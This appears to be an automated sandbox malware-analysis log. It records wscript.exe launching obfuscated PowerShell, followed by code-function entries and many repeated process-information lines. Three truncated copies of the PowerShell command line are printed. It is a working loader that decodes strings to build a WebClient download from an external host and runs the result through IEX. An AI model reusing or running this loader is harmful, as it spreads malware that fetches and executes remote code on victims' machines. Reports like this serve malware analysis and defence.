              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Marcionitic)$gLObaL:snacKS = [SyStEm.TExt.ENcoDiNG]::AsCIi.GetstRiNg($VuLGARiseredES)$GLOBaL:sOvEPUDenS=$SNaCKS.suBsTRing($joSInEs,$SEnSiBIliSErINgEnS)<#Hydrauliks Compleat Ryatpper
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Alimentation; function Chirked($Hajji){$Forsorgslederne=4;$Xenos=$Forsorgslederne;do{$Lreanstalterne+=$Hajji[$Xenos];$Xenos+=5} until(!$Hajji[$Xenos])$Lreanstalterne}function Hypohyaline($banestrkning){ .($Elektriciteten) ($banestrkning)}$Crassitude=Chirked 'Bes nBoreE NeiTBipa.overW';$Crassitude+=Chirked 'Hob E ptobUnfeCfraglAl tiTeksEReban StjT';$Ruineringer=Chirked 'OplbMS inoBrynz utiambylforsl Pepa U i/';$Tikampens=Chirked 'B edTDuntlC tasNeop1 For2';$Trappeopgangen='Jan,[ NonNRa heAgriT Iag.PoetSsil e Ra RPre vNu.kIPredC ncoE ympMakrOVet,IFremNConttDobbMOve AHykenHem.aHe,sgGarre.itrrrefl] ase: Dra:SgdcS Feie UdtcSnabUKantrSgepiCapeTReenyRagopAl erInflo AksT UnboTinaCurfuoStanLSamv=Ernr$ScratHousIfarvkTipbAAffaMEurop S.keHngsnUdarS';$Ruineringer+=Chirked 'Over5Crul.Cell0 Ans P yc(C.xcW illi RepnIndidLakkoMasowTilrs rog MangN,aveT Kon Hemo1B oc0chir.Blat0 Sla;Strk isWAfkliUdt nSinu6Bomb4Vent;,obb Poinx il6Un r4 Tem;Jupe ForrEpopvTour:Tele1Mo,s3Trep1pil .Carb0 Liv)U.pr WallGUnsceParic SkukNonvoChem/Sauc2 Uci0Vrdi1Tand0Bro 0Kary1yngl0Pupp1Res TagsFIns iMat r IrieSubsffirmo nonxHvid/Exem1 rk3fodm1L,ge. O e0';$morgentaage=Chirked ' biluHypoSSproeTraeRGinh-Un ea DelgPreleAlr n Arbt';$Snyd=Chirked ' anehHjultA,ietAparpJacksudsl: rog/ Ops/GenbfSpidoPr,m2KiskxSammcSvig.Hin ichi cJvnguMa i/NonsyWismA,usivSupeXHin.CmonorFairQsnveD G u/ AtoMT areglyks Ya.tFingrresueCoaln TwidMesaeItab.Wunnt OveoTutsc';$Messieurs=Chirked 'Diss>';$Elektriciteten=Chirked 'DikiISanseFarbX';$Fungeres='Overfrsels';$Teleteknikken='\Mikadoerne124.Sty';Hypohyaline (Chirked ' urt$Dag,gSeisl.audo CosB R taAeroL.isa:Tm eIImprN O,etJag Uv ntidecoTProgI La O DirNA,greProdR ov.NSy eeInfosOct =Offc$ fskeSidenMin V pro:Fir.A Prep ForPS gidVa.saTalltDagnAment+Am,z$TindT HalEArmbLJeweELderTf,eee nankfysin ignITavikAd bKF geeKe ln');Hypohyaline (Chirked ' u s$ Ustg amblOceao.rilbPlanAsnowl C e:Che tPervHTappIUl mCEx,oK KreS ParEHetetR mm=Suff$Ly tsC cknS,miYMotodAnsv.BeamsLichp VanLMoniiNonrT A,a(Relo$ Hy,M RefERiskSAnakS Fa INaboEDuodUBe.eR Ma.sUlyk)');Hypohyaline (Chirked $Trappeopgangen);$Snyd=$thickset[0];$Antenners192=(Chirked 'P ys$ScugGKopulSt,gO BriBLaveaSuchlWilt:HvidnP ilOContNMellpUndeeOmherOraoc Je E.argPSensTMariIP isvHy.deK mpn ygESvens KlusProa= unNRickEFidiWAdsk-Fa kO SloBToppJPusleVgeaCAntitfor SikkSTrimYKerasSemitAcquEBr.mm Sha.Kart$ResucReoxRAareaGillsFadmsFil IMo.sT TauUU dgdTn,ee');Hypohyaline ($Antenners192);Hypohyaline (Chirked 'Halv$SerpN EyeoBimmn uttpS kkeChu rSkracMetaeFla,pInastBespi UnavB cye krnUkrneMachs rolsSemi.DrysHAntie K.eaHydrdMo.oe SalrF.easVi d[Aest$ TopmIncro Vi r LingSoeneperln,nsvtLandaMoseaThergGemoeG,mb] Reg= Sc.$ iddREddiu S aiAfgrnMisre PrerSamti GynnDepogFiskeSvalr');$Honorifical179=Chirked 'Clav$UnocN CuloRe in.vidpS.ape U sr CoucCalyeOddspPorctHydriHandvTilpeKompnIdoteret sKerssIvor.St rD Diso nsw ign Fo
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Alimentation; function Chirked($Hajji){$Forsorgslederne=4;$Xenos=$Forsorgslederne;do{$Lreanstalterne+=$Hajji[$Xenos];$Xenos+=5} until(!$Hajji[$Xenos])$Lreanstalterne}function Hypohyaline($banestrkning){ .($Elektriciteten) ($banestrkning)}$Crassitude=Chirked 'Bes nBoreE NeiTBipa.overW';$Crassitude+=Chirked 'Hob E ptobUnfeCfraglAl tiTeksEReban StjT';$Ruineringer=Chirked 'OplbMS inoBrynz utiambylforsl Pepa U i/';$Tikampens=Chirked 'B edTDuntlC tasNeop1 For2';$Trappeopgangen='Jan,[ NonNRa heAgriT Iag.PoetSsil e Ra RPre vNu.kIPredC ncoE ympMakrOVet,IFremNConttDobbMOve AHykenHem.aHe,sgGarre.itrrrefl] ase: Dra:SgdcS Feie UdtcSnabUKantrSgepiCapeTReenyRagopAl erInflo AksT UnboTinaCurfuoStanLSamv=Ernr$ScratHousIfarvkTipbAAffaMEurop S.keHngsnUdarS';$Ruineringer+=Chirked 'Over5Crul.Cell0 Ans P yc(C.xcW illi RepnIndidLakkoMasowTilrs rog MangN,aveT Kon Hemo1B oc0chir.Blat0 Sla;Strk isWAfkliUdt nSinu6Bomb4Vent;,obb Poinx il6Un r4 Tem;Jupe ForrEpopvTour:Tele1Mo,s3Trep1pil .Carb0 Liv)U.pr WallGUnsceParic SkukNonvoChem/Sauc2 Uci0Vrdi1Tand0Bro 0Kary1yngl0Pupp1Res TagsFIns iMat r IrieSubsffirmo nonxHvid/Exem1 rk3fodm1L,ge. O e0';$morgentaage=Chirked ' biluHypoSSproeTraeRGinh-Un ea DelgPreleAlr n Arbt';$Snyd=Chirked ' anehHjultA,ietAparpJacksudsl: rog/ Ops/GenbfSpidoPr,m2KiskxSammcSvig.Hin ichi cJvnguMa i/NonsyWismA,usivSupeXHin.CmonorFairQsnveD G u/ AtoMT areglyks Ya.tFingrresueCoaln TwidMesaeItab.Wunnt OveoTutsc';$Messieurs=Chirked 'Diss>';$Elektriciteten=Chirked 'DikiISanseFarbX';$Fungeres='Overfrsels';$Teleteknikken='\Mikadoerne124.Sty';Hypohyaline (Chirked ' urt$Dag,gSeisl.audo CosB R taAeroL.isa:Tm eIImprN O,etJag Uv ntidecoTProgI La O DirNA,greProdR ov.NSy eeInfosOct =Offc$ fskeSidenMin V pro:Fir.A Prep ForPS gidVa.saTalltDagnAment+Am,z$TindT HalEArmbLJeweELderTf,eee nankfysin ignITavikAd bKF geeKe ln');Hypohyaline (Chirked ' u s$ Ustg amblOceao.rilbPlanAsnowl C e:Che tPervHTappIUl mCEx,oK KreS ParEHetetR mm=Suff$Ly tsC cknS,miYMotodAnsv.BeamsLichp VanLMoniiNonrT A,a(Relo$ Hy,M RefERiskSAnakS Fa INaboEDuodUBe.eR Ma.sUlyk)');Hypohyaline (Chirked $Trappeopgangen);$Snyd=$thickset[0];$Antenners192=(Chirked 'P ys$ScugGKopulSt,gO BriBLaveaSuchlWilt:HvidnP ilOContNMellpUndeeOmherOraoc Je E.argPSensTMariIP isvHy.deK mpn ygESvens KlusProa= unNRickEFidiWAdsk-Fa kO SloBToppJPusleVgeaCAntitfor SikkSTrimYKerasSemitAcquEBr.mm Sha.Kart$ResucReoxRAareaGillsFadmsFil IMo.sT TauUU dgdTn,ee');Hypohyaline ($Antenners192);Hypohyaline (Chirked 'Halv$SerpN EyeoBimmn uttpS kkeChu rSkracMetaeFla,pInastBespi UnavB cye krnUkrneMachs rolsSemi.DrysHAntie K.eaHydrdMo.oe SalrF.easVi d[Aest$ TopmIncro Vi r LingSoeneperln,nsvtLandaMoseaThergGemoeG,mb] Reg= Sc.$ iddREddiu S aiAfgrnMisre PrerSamti GynnDepogFiskeSvalr');$Honorifical179=Chirked 'Clav$UnocN CuloRe in.vidpS.ape U sr CoucCalyeOddspPorctHydriHandvTilpeKompnIdoteret sKerssIvor.St rD Diso nsw ign Fo
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Alimentation; function Chirked($Hajji){$Forsorgslederne=4;$Xenos=$Forsorgslederne;do{$Lreanstalterne+=$Hajji[$Xenos];$Xenos+=5} until(!$Hajji[$Xenos])$Lreanstalterne}function Hypohyaline($banestrkning){ .($Elektriciteten) ($banestrkning)}$Crassitude=Chirked 'Bes nBoreE NeiTBipa.overW';$Crassitude+=Chirked 'Hob E ptobUnfeCfraglAl tiTeksEReban StjT';$Ruineringer=Chirked 'OplbMS inoBrynz utiambylforsl Pepa U i/';$Tikampens=Chirked 'B edTDuntlC tasNeop1 For2';$Trappeopgangen='Jan,[ NonNRa heAgriT Iag.PoetSsil e Ra RPre vNu.kIPredC ncoE ympMakrOVet,IFremNConttDobbMOve AHykenHem.aHe,sgGarre.itrrrefl] ase: Dra:SgdcS Feie UdtcSnabUKantrSgepiCapeTReenyRagopAl erInflo AksT UnboTinaCurfuoStanLSamv=Ernr$ScratHousIfarvkTipbAAffaMEurop S.keHngsnUdarS';$Ruineringer+=Chirked 'Over5Crul.Cell0 Ans P yc(C.xcW illi RepnIndidLakkoMasowTilrs rog MangN,aveT Kon Hemo1B oc0chir.Blat0 Sla;Strk isWAfkliUdt nSinu6Bomb4Vent;,obb Poinx il6Un r4 Tem;Jupe ForrEpopvTour:Tele1Mo,s3Trep1pil .Carb0 Liv)U.pr WallGUnsceParic SkukNonvoChem/Sauc2 Uci0Vrdi1Tand0Bro 0Kary1yngl0Pupp1Res TagsFIns iMat r IrieSubsffirmo nonxHvid/Exem1 rk3fodm1L,ge. O e0';$morgentaage=Chirked ' biluHypoSSproeTraeRGinh-Un ea DelgPreleAlr n Arbt';$Snyd=Chirked ' anehHjultA,ietAparpJacksudsl: rog/ Ops/GenbfSpidoPr,m2KiskxSammcSvig.Hin ichi cJvnguMa i/NonsyWismA,usivSupeXHin.CmonorFairQsnveD G u/ AtoMT areglyks Ya.tFingrresueCoaln TwidMesaeItab.Wunnt OveoTutsc';$Messieurs=Chirked 'Diss>';$Elektriciteten=Chirked 'DikiISanseFarbX';$Fungeres='Overfrsels';$Teleteknikken='\Mikadoerne124.Sty';Hypohyaline (Chirked ' urt$Dag,gSeisl.audo CosB R taAeroL.isa:Tm eIImprN O,etJag Uv ntidecoTProgI La O DirNA,greProdR ov.NSy eeInfosOct =Offc$ fskeSidenMin V pro:Fir.A Prep ForPS gidVa.saTalltDagnAment+Am,z$TindT HalEArmbLJeweELderTf,eee nankfysin ignITavikAd bKF geeKe ln');Hypohyaline (Chirked ' u s$ Ustg amblOceao.rilbPlanAsnowl C e:Che tPervHTappIUl mCEx,oK KreS ParEHetetR mm=Suff$Ly tsC cknS,miYMotodAnsv.BeamsLichp VanLMoniiNonrT A,a(Relo$ Hy,M RefERiskSAnakS Fa INaboEDuodUBe.eR Ma.sUlyk)');Hypohyaline (Chirked $Trappeopgangen);$Snyd=$thickset[0];$Antenners192=(Chirked 'P ys$ScugGKopulSt,gO BriBLaveaSuchlWilt:HvidnP ilOContNMellpUndeeOmherOraoc Je E.argPSensTMariIP isvHy.deK mpn ygESvens KlusProa= unNRickEFidiWAdsk-Fa kO SloBToppJPusleVgeaCAntitfor SikkSTrimYKerasSemitAcquEBr.mm Sha.Kart$ResucReoxRAareaGillsFadmsFil IMo.sT TauUU dgdTn,ee');Hypohyaline ($Antenners192);Hypohyaline (Chirked 'Halv$SerpN EyeoBimmn uttpS kkeChu rSkracMetaeFla,pInastBespi UnavB cye krnUkrneMachs rolsSemi.DrysHAntie K.eaHydrdMo.oe SalrF.easVi d[Aest$ TopmIncro Vi r LingSoeneperln,nsvtLandaMoseaThergGemoeG,mb] Reg= Sc.$ iddREddiu S aiAfgrnMisre PrerSamti GynnDepogFiskeSvalr');$Honorifical179=Chirked 'Clav$UnocN CuloRe in.vidpS.ape U sr CoucCalyeOddspPorctHydriHandvTilpeKompnIdoteret sKerssIvor.St rD Diso nsw ign Fo Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,9_2_004044A4
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848C451E5 push eax; ret 2_2_00007FF848C45251
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_049535ED push ebx; iretd 4_2_049536DA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0495D760 pushad ; ret 4_2_0495D761
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0495DA0C pushfd ; ret 4_2_0495DA0D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07791050 pushad ; ret 4_2_07791069
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_092D39C3 push esp; iretd 4_2_092D39C4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_092D13BB pushfd ; retf 4_2_092D13BC
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_092D1236 push ebp; ret 4_2_092D127E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_092D1261 push ebp; ret 4_2_092D127E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02A82806 push ecx; ret 7_2_02A82819
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_03D339C3 push esp; iretd 7_2_03D339C4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_03D313BB pushfd ; retf 7_2_03D313BC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_03D31261 push ebp; ret 7_2_03D3127E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_03D31236 push ebp; ret 7_2_03D3127E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044693D push ecx; ret 9_2_0044694D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044DB70 push eax; ret 9_2_0044DB84
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044DB70 push eax; ret 9_2_0044DBAC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00451D54 push eax; ret 9_2_00451D61
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044B090 push eax; ret 10_2_0044B0A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044B090 push eax; ret 10_2_0044B0CC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00451D34 push eax; ret 10_2_00451D41
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00444E71 push ecx; ret 10_2_00444E81
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00414060 push eax; ret 11_2_00414074
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00414060 push eax; ret 11_2_0041409C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00414039 push ecx; ret 11_2_00414049
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004164EB push 0000006Ah; retf 11_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00416553 push 0000006Ah; retf 11_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00416555 push 0000006Ah; retf 11_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_004047CB
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
